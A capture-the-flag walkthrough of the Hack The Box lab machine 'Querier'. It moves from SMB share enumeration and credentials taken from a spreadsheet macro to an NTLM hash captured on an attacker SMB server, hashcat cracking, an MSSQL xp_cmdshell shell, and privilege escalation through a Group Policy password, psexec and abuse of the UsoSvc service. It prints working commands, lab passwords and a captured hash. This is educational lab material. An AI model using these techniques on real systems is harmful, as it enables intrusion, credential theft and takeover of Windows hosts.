Enumeration
Port scanning
Let’s scan the full range of TCP and UDP ports using my tool htbscan.py (you can find it here: code-snippets/htbscan.py at master · Alamot/code-snippets · GitHub)
$ sudo htbscan.py 10.10.10.125 -o querier_enum.txt
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-06-21 16:06:53 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49671/tcp on 10.10.10.125
Discovered open port 49666/tcp on 10.10.10.125
Discovered open port 135/tcp on 10.10.10.125
Discovered open port 49668/tcp on 10.10.10.125
Discovered open port 139/tcp on 10.10.10.125
Discovered open port 1433/tcp on 10.10.10.125
Discovered open port 49670/tcp on 10.10.10.125
Discovered open port 47001/tcp on 10.10.10.125
Discovered open port 49664/tcp on 10.10.10.125
Discovered open port 49669/tcp on 10.10.10.125
Discovered open port 445/tcp on 10.10.10.125
Discovered open port 49665/tcp on 10.10.10.125
Discovered open port 5985/tcp on 10.10.10.125
Discovered open port 49667/tcp on 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-21 19:17 EEST
Nmap scan report for QUERIER (10.10.10.125)
Host is up (0.065s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-06-21T15:32:31
|_Not valid after: 2049-06-21T15:32:31
|_ssl-date: 2019-06-21T16:18:33+00:00; +5s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (92%), Microsoft Windows Server 2016 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (91%), Microsoft Windows Server 2012 R2 (90%), Microsoft Windows Server 2012 R2 Update 1 (90%), Microsoft Windows Server 2016 build 10586 - 14393 (90%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (90%), Microsoft Windows 10 1511 (90%), Microsoft Windows 10 1703 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4s, deviation: 0s, median: 4s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-21 19:18:34
|_ start_date: N/A
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 64.45 ms 10.10.12.1
2 64.12 ms QUERIER (10.10.10.125)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.45 seconds
Discovering shares
Let’s enum shares:
$ smbmap.py -H 10.10.10.125
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445 Name: QUERIER
Disk Permissions
---- -----------
[!] Access Denied
Hmmmm… Let’s try a dummy username:
$ smbmap.py -H 10.10.10.125 -u 'type_whatever_you_want_here'
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445 Name: QUERIER
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
IPC$ READ ONLY
Reports READ ONLY
Surprise, surprise. It works (stupid SMB protocol :P). Let’s use Impacket’s smbclient.py to examine the ‘Reports’ share:
$ smbclient.py -no-pass QUERIER/username_does_not_matter@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
C$
IPC$
Reports
# use Reports
# ls
drw-rw-rw- 0 Tue Jan 29 01:26:31 2019 .
drw-rw-rw- 0 Tue Jan 29 01:26:31 2019 ..
-rw-rw-rw- 12229 Tue Jan 29 01:26:31 2019 Currency Volume Report.xlsm
# get Currency Volume Report.xlsm
# exit
We can open this xlsm file using -for example- LibreOffice. If we examine the macros (Tools → Macros → Edit Macros) we discover some MSSQL credentials:
...
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
...
In case you didn’t know it, xlsm, xlsx, docx et.c. are just zip archives. Therefore, we can decompress them:
$ unzip Currency\ Volume\ Report.xlsm
Archive: Currency Volume Report.xlsm
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: xl/workbook.xml
inflating: xl/_rels/workbook.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/vbaProject.bin
inflating: docProps/core.xml
inflating: docProps/app.xml
$ strings xl/vbaProject.bin
...
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
...
Let’s try to connect to the MS SQL server using Impacket’s msssqlclient.py:
$ mssqlclient.py -windows-auth QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Neat! Now, let’s try to execute a command using the ‘xp_cmdshell’ procedure:
SQL> EXEC xp_cmdshell "whoami"
[-] ERROR(QUERIER): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
Hmmm, well that didn’t work. Let’s try to activate ‘xp_cmdshell’:
SQL> EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE;
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL>
Nope. Apparently the user ‘reporting’ doesn’t have the required privileges/permissions.
Capturing credentials
Well, we can try -using our ‘reporting’ account- to capture some other credentials… We will use Impacket’s smbserver.py to listen for incoming SMB connections:
$ sudo smbserver.py -smb2support myshare /tmp
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Now, we can use msdat tool (GitHub - quentinhardy/msdat: MSDAT: Microsoft SQL Database Attacking Tool) to send some traffic towards our SMB server:
$ msdat smbauthcapture -v -s 10.10.10.125 -p 1433 -D QUERIER -U reporting -P 'PcwTWTHRwryjc$c6' --capture 10.10.15.16
[1] (10.10.10.125:1433): Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method
00:51:22 INFO -: Test all methods allowing to capture a SMB authentication...
00:51:22 INFO -: Capturing SMB Authentication via XP_DIRTREE...
00:51:23 INFO -: No error during the running: you could capture the SMB authentication
[+] You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !
Let’s see what we received in our SMB server:
[*] Incoming connection (10.10.10.125,49741)
[*] AUTHENTICATE_MESSAGE (QUERIER\mssql-svc,QUERIER)
[*] User mssql-svc\QUERIER authenticated successfully
[*] mssql-svc::QUERIER:4141414141414141:790d1a20ff18cdb330b3b6e43bca6988:010100000000000000e901777b28d50126ad6b81542b18860000000001001000780051004d005a004a006f004f00730002001000780048004f00540045006b006300610003001000780051004d005a004a006f004f00730004001000780048004f00540045006b00630061000700080000e901777b28d50106000400020000000800300030000000000000000000000000300000590946bc19d0765a150c1c561e8ea40b9f0627e137bb3b8950ad8952e5b6f3930a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e0031003600000000000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found S
[-] SMB2_TREE_CONNECT not found S
[*] AUTHENTICATE_MESSAGE (\,QUERIER)
[*] User \QUERIER authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:IPC$)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.125,49741)
[*] Remaining connections []
Let’s try to crack/reverse this hash using hashcat:
$ hashcat -h | grep -i NetNTLMv2
5600 | NetNTLMv2 | Network Protocols
$ hashcat -m 5600 mssql-svc::QUERIER:4141414141414141:790d1a20ff18cdb330b3b6e43bca6988:010100000000000000e901777b28d50126ad6b81542b18860000000001001000780051004d005a004a006f004f00730002001000780048004f00540045006b006300610003001000780051004d005a004a006f004f00730004001000780048004f00540045006b00630061000700080000e901777b28d50106000400020000000800300030000000000000000000000000300000590946bc19d0765a150c1c561e8ea40b9f0627e137bb3b8950ad8952e5b6f3930a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e0031003600000000000000000000000000 /usr/share/dict/rockyou.txt
...
corporate568
Getting (mssql) shell as mssql-svc
It’s high time to get a shell. We can use a tool I wrote (MSSQL shell with file upload capability - The Portal of Knowledge). First, we have to edit some settings inside the script:
...
MSSQL_SERVER="10.10.10.125"
MSSQL_USERNAME = "QUERIER\\mssql-svc"
MSSQL_PASSWORD = "corporate568"
...
Now, let’s run it:
$ python mssql_shell.py
Successful login: QUERIER\mssql-svc@10.10.10.125
Trying to enable xp_cmdshell ...
CMD mssql-svc@QUERIER C:\Windows\system32> whoami
querier\mssql-svc
CMD mssql-svc@QUERIER C:\Windows\system32> type C:\Users\mssql-svc\Desktop\user.txt
c*****************************6
Privilege escalation
Let’s upload PowerUp.ps1 (PowerSploit/PowerUp.ps1 at master · PowerShellMafia/PowerSploit · GitHub):
CMD mssql-svc@QUERIER C:\Windows\system32> cd C:\Users\Public
CMD mssql-svc@QUERIER C:\Users\Public> UPLOAD PowerUp.ps1 C:\Users\Public\PowerUp.ps1
Uploading PowerUp.ps1 to C:\Users\Public\PowerUp.ps1
Data length (b64-encoded): 732KB
100%|██████████| 735/735 [00:50<00:00, 16.63KB/s]
Input Length = 750897
Output Length = 562841
CertUtil: -decode command completed successfully.
MD5 hashes match: 711ca55ca8d9ba4f776ce052417fd98f
*** UPLOAD PROCEDURE FINISHED ***
CMD mssql-svc@QUERIER C:\Users\Public>
Now, let’s run PowerUp.ps1:
CMD mssql-svc@QUERIER C:\Users\Public> powershell -command "& { . .\PowerUp.ps1; Invoke-AllChecks | Out-File -Encoding ASCII powerup_output.txt }"
CMD mssql-svc@QUERIER C:\Users\Public> type powerup_output.txt
...
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
...
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
...
[*] Checking for cached Group Policy Preferences .xml files....
None
None
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
...
Using the Group Policy password and psexec.py
We can use Impacket’s psexec.py to get nt system/authority:
$ psexec.py QUERIER/Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file UNLjBysl.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service bhCD on 10.10.10.125.....
[*] Starting service bhCD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>cd /users/administrator/desktop
C:\Users\Administrator\Desktop>type root.txt
b******************************2
Hooray! 
(Ab)Using UsoSvc service
Let’s examine the “UsoSvc” service:
CMD mssql-svc@QUERIER C:\Users\Public> sc qc "UsoSvc"
[SC] QueryServiceConfig SUCCESS
None
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs -p
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
Let’s exploit it:
CMD mssql-svc@QUERIER C:\Users\Public> powershell -command "& { . .\PowerUp.ps1; Invoke-ServiceAbuse -ServiceName UsoSvc | Out-File -Encoding ASCII output.txt }"
CMD mssql-svc@QUERIER C:\Users\Public> type output.txt
ServiceAbused Command
------------- -------
UsoSvc net user john Password123! /add && net localgroup Administrators john /add
Let’s see if our exploitation was successful:
CMD mssql-svc@QUERIER C:\Users\Public> net user
User accounts for \\QUERIER
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
john mssql-svc reporting
WDAGUtilityAccount
The command completed successfully.
We could do also things like that et.c.:
$ sc config UsoSvc binPath="cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\a.txt"
That’s all folks! 